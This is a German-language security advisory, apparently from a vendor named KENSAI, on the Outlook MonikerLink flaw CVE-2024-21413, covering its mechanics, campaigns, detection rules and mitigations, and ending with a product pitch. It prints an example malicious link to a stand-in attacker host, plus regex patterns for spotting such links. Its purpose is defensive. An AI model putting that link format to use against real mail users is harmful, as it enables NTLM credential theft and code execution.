CVE-2024-21413: Microsoft Outlook MonikerLink RCE
„MonikerLink“ genannt, ist CVE-2024-21413 eine kritische Microsoft-Outlook-Schwachstelle, die die geschützte Ansicht umgeht, um Remote Code Execution und NTLM-Credential-Diebstahl zu erreichen — allein durch die Vorschau einer bösartigen E-Mail. CVSS 9.8 CRITICAL. Keine Nutzerinteraktion über die E-Mail-Vorschau hinaus erforderlich.
| Attribut | Wert |
|---|---|
| CVE-ID | CVE-2024-21413 |
| CVSS-Vektor | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE | CWE-20: Improper Input Validation |
| Veröffentlicht | 13. Februar 2024 |
| Ausnutzung | Öffentlicher PoC — weit verbreitet ausgenutzt |
Was ist CVE-2024-21413?
CVE-2024-21413 nutzt aus, wie Microsoft Outlook Hyperlinks behandelt, die das Zeichen ! (Ausrufezeichen) als Teil einer File-Moniker-URI enthalten. Normalerweise wendet Outlook auf aus E-Mails geöffnete Dokumente die „geschützte Ansicht“ an — sie sandboxt Office-Dokumente, um Code-Ausführung zu verhindern. Diese Schwachstelle umgeht diesen Schutz vollständig.
Durch einen Hyperlink im Format file://ATTACKER-SERVER/test.rtf!something bringt ein Angreifer Outlook dazu, die RTF-Datei ohne geschützte Ansicht zu öffnen und gleichzeitig einen automatischen NTLM-Authentifizierungsversuch zum SMB-Server des Angreifers auszulösen. Der Angreifer erfasst den NTLMv2-Hash für Offline-Cracking oder Relay-Angriffe.
🚨 Vorschaubereich-Angriff — kein Klick erforderlich
Diese Schwachstelle wird im Outlook-Vorschaubereich ausgelöst. Das Opfer muss die E-Mail im Posteingang nur auswählen — kein Öffnen von Anhängen, kein Klicken auf Links nötig. In einer Unternehmensumgebung könnte eine einzige an eine Verteilerliste gesendete Phishing-E-Mail Hunderte NTLMv2-Hashes gleichzeitig kompromittieren.
Betroffene Produkte
| Produkt | Betroffene Versionen |
|---|---|
| Microsoft Outlook 2016 | Vor dem Februar-2024-Update |
| Microsoft Outlook 2019 | Vor dem Februar-2024-Update |
| Microsoft Outlook LTSC 2021 | Vor dem Februar-2024-Update |
| Microsoft 365 Apps for Enterprise | Vor dem Februar-2024-Update |
Nicht betroffen: Outlook im Web (OWA), Outlook für iOS/Android, Outlook für Mac. Die Schwachstelle ist spezifisch für Windows-Desktop-Outlook-Clients.
Angriffsmechanik: Die MonikerLink-Technik
Windows COM (Component Object Model) nutzt „Monikers“, um Objekte über den Namen zu binden. Das file://-URI-Schema in Windows kann nach dem Zeichen ! eine Moniker-Komponente enthalten, die Windows anweist, das referenzierte COM-Objekt zu laden und zu aktivieren.
# Normal file link — Protected View applied file://attacker.com/share/document.rtf # MonikerLink bypass — ! bypasses Protected View file://attacker.com/share/document.rtf!1337 # When Outlook processes the MonikerLink: # 1. Attempts SMB connection to attacker.com # 2. Sends NTLMv2 authentication (captures hash) # 3. Opens file without Protected View # 4. If file is malicious RTF → RCE
Ablauf der NTLM-Hash-Erfassung
Auch ohne waffenfähige RTF-Datei ist der NTLM-Relay-Angriff folgenreich:
- Opfer sieht bösartige E-Mail in Outlook in der Vorschau
- Outlook stellt automatisch eine SMB-Verbindung zum angreiferkontrollierten Server her
- Windows sendet NTLMv2-Challenge-Response (Hash) zur Authentifizierung
- Angreifer erfasst den Hash mit Responder, Impacket oder ähnlichen Tools
- Hash offline geknackt (schwache Passwörter in Stunden) oder in Echtzeit an andere Dienste weitergereicht
Ausnutzung in der Praxis
Nach der Veröffentlichung des öffentlichen PoC wurde CVE-2024-21413 innerhalb von Tagen in kommerzielle Phishing-Toolkits integriert. Beobachtete Kampagnen umfassten:
- Unternehmensweites Credential-Harvesting: Massen-E-Mails an Enterprise-Verteilerlisten, um große Mengen NTLM-Hashes zu erfassen
- Gezielter Initial Access: Spear-Phishing von Führungskräften mit maßgeschneiderten E-Mails, die MonikerLink-Payloads enthalten
- Lateral-Movement-Ketten: NTLM-Relay von erfassten Hashes zu internen Diensten (SMB, LDAP, HTTP)
- Business Email Compromise: Credential-Harvesting, das Postfachzugriff für BEC-Betrug ermöglicht
Erkennung
E-Mail-Gateway-Regeln
# Regex pattern for MonikerLink in email body/attachments # Detect file:// links containing ! character \bfile:\/\/[^\s"']+![^\s"']* # Block external UNC/file links entirely (recommended) \bfile:\/\/[^\s"']+ \\\\[a-z0-9.-]+\\
Netzwerk-Erkennung
- SMB-Verbindungen von Endpoint-Workstations zu externen IP-Adressen (sollte nie vorkommen)
- NTLMv2-Authentifizierungsversuche zu unerwarteten Ziel-IPs
- DNS-Anfragen nach angreiferkontrollierten Domains von Mail-Clients
Endpoint-Erkennung
- OUTLOOK.EXE, das ausgehende TCP/445-Verbindungen initiiert
- Office-Prozess, der nach E-Mail-Vorschau Kindprozesse startet
- LSASS-Zugriff durch Office-Prozesse
Mitigation
- Februar-2024-Patches anwenden: Das Microsoft Security Update für Outlook behebt die Umgehung der geschützten Ansicht
- Ausgehendes SMB am Perimeter blockieren: Firewall-Regeln, die ausgehendes TCP/445 und TCP/139 blockieren, verhindern die NTLM-Hash-Erfassung selbst dann, wenn die Schwachstelle auslöst
- NTLM-Relay-Schutz aktivieren: Konfigurieren Sie SMB-Signing und LDAP-Signing, um Relay-Angriffe zu verhindern
- E-Mail-Security-Gateway einsetzen: Blockieren Sie E-Mails, die
file://- und\\-Links (UNC-Pfad) in Text und Anhängen enthalten - NTLM wo möglich deaktivieren: Organisationen, die Kerberos nutzen, können NTLM deaktivieren, um den Hash-Erfassungs-Angriffspfad zu eliminieren
💡 Defense in Depth: Selbst wenn Sie Outlook gepatcht haben, ist das Blockieren von ausgehendem SMB an der Firewall eine Best Practice, die diese gesamte Angriffsklasse verhindert. Viele Organisationen erlauben ausgehendes SMB aus Legacy-Dateifreigabe-Gründen — auditieren und beschränken Sie dies sofort.
KENSAI-Erkennungsfähigkeit
- Inventar der E-Mail-Client-Versionen: KENSAI identifiziert Outlook-Versionen in Ihrer Organisation und markiert ungepatchte, für CVE-2024-21413 verwundbare Versionen
- Phishing-Simulation: KENSAIs Phishing-Assessment-Modul kann die Anfälligkeit von Mitarbeitenden für MonikerLink-artige Köder testen
- Netzwerk-Exposure-Analyse: Identifiziert fehlkonfigurierte Firewalls, die ausgehendes SMB von Workstations erlauben
- Patch-Compliance: Kontinuierliches Monitoring der Microsoft-Office-Patch-Stände gegen bekannte CVE-Abdeckung
Sind Ihre Outlook-Clients gegen MonikerLink gepatcht?
KENSAI scannt Ihre Endpoint-Flotte auf verwundbare Outlook-Versionen und identifiziert Netzwerkpfade, die eine NTLM-Hash-Erfassung ermöglichen würden. Verschaffen Sie sich in Minuten Sichtbarkeit.
Ihre E-Mail-Angriffsfläche bewerten →